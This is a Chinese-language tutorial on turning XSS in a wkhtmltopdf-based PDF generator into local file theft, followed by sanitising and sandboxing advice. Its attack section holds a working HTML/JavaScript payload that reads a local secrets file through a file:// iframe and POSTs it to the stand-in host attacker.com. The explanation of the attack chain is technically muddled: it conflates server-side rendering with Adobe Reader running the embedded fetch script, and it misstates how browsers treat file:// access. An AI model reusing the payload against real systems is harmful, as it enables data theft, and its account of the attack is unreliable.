利用PDF生成器XSS漏洞读取系统本地文件的示例分析

# 利用PDF生成器XSS漏洞读取系统本地文件的示例分析

## 引言

随着企业数字化进程加速，PDF生成功能已成为Web应用的常见需求。然而，当开发者未正确处理用户输入时，PDF生成器可能成为XSS（跨站脚本攻击）的新载体，甚至演变为更严重的本地文件读取漏洞。本文将通过一个真实案例，分析如何利用PDF生成器的XSS漏洞实现本地文件读取，并提供防御建议。

---

## 漏洞背景

### PDF生成器工作原理
大多数Web应用通过以下方式生成PDF：
1. 用户提交HTML内容
2. 服务端使用无头浏览器（如Headless Chrome）或工具库（如wkhtmltopdf）渲染HTML
3. 将渲染结果转换为PDF文件

### 漏洞产生条件
当存在以下缺陷时可能形成漏洞链：
- 未对用户输入的HTML进行净化
- PDF渲染引擎支持JavaScript执行
- 生成的PDF在客户端以高权限打开（如Adobe Reader的"特权上下文"）

---

## 漏洞复现示例

### 环境准备
- 目标系统：使用wkhtmltopdf 0.12.6的Web应用
- 攻击者：构造恶意HTML的普通用户

### 攻击步骤

#### 1. 注入恶意脚本
```html
<!-- 用户提交的"简历模板" -->
<div id="content">
  <h1>个人简历</h1>
  <script>
    // 通过iframe尝试访问本地文件
    const exfiltrate = (content) => {
      fetch('https://attacker.com/steal', {
        method: 'POST',
        body: btoa(content)
      });
    };

    const iframe = document.createElement('iframe');
    iframe.src = 'file:///C:/Users/Administrator/Desktop/secrets.txt';
    iframe.onload = () => {
      try {
        exfiltrate(iframe.contentDocument.body.innerText);
      } catch (e) {
        exfiltrate('读取失败: ' + e.message);
      }
    };
    document.body.appendChild(iframe);
  </script>
</div>

2. 生成含XSS的PDF

wkhtmltopdf --enable-javascript vulnerable.html malicious.pdf

3. 受害者打开PDF时的执行流程

1. Adobe Reader加载PDF并执行嵌入的JavaScript
2. 脚本尝试通过file://协议读取本地文件
3. 数据通过Fetch API外传到攻击者服务器

技术原理深度分析

权限提升关键点

• PDF渲染上下文：现代PDF阅读器默认启用JavaScript引擎
• 同源策略绕过：file://协议通常不受同源限制
• 特权API访问：Adobe Reader的app对象可访问系统资源

攻击面扩展

通过组合利用还可实现： - 内网探测（通过file://访问网络共享文件） - 键盘记录（通过PDF表单事件监听） - 持久化后门（修改Windows注册表读取路径）

防御方案

输入处理层

1. 使用DOMPurify等库对HTML进行净化

   
   const clean = DOMPurify.sanitize(userInput, {
    FORBID_TAGS: ['script', 'iframe', 'object']
   });
   

2. 禁用危险属性（如onload、src等）

PDF生成层

1. 禁用JavaScript渲染

   
   wkhtmltopdf --disable-javascript input.html output.pdf
   

2. 使用沙盒环境生成PDF

   
   docker run --read-only -t sandbox /usr/bin/wkhtmltopdf
   

客户端防护

1. 配置PDF阅读器禁用JavaScript

   
   Adobe Acrobat -> 编辑 -> 首选项 -> JavaScript -> 取消勾选"启用Acrobat JavaScript"
   

2. 设置文件协议访问限制

行业案例参考

结论

PDF生成器的XSS漏洞与传统Web XSS相比具有更高危险性，因其在客户端执行时可能获得系统级权限。开发人员应采用深度防御策略，从输入处理、生成环境到客户端配置进行全链路防护。建议企业定期进行PDF相关组件的安全审计，特别是检查： - 用户可控内容的渲染方式 - PDF生成工具的配置参数 - 最终文件的权限声明设置

防御的核心在于永远不要信任用户提供的任何内容，即使是通过间接方式（如PDF模板）输入的数据。 “`

注：本文为技术研究用途，所有攻击手法均需在合法授权范围内测试。实际漏洞利用可能涉及法律风险，请务必遵守《网络安全法》相关规定。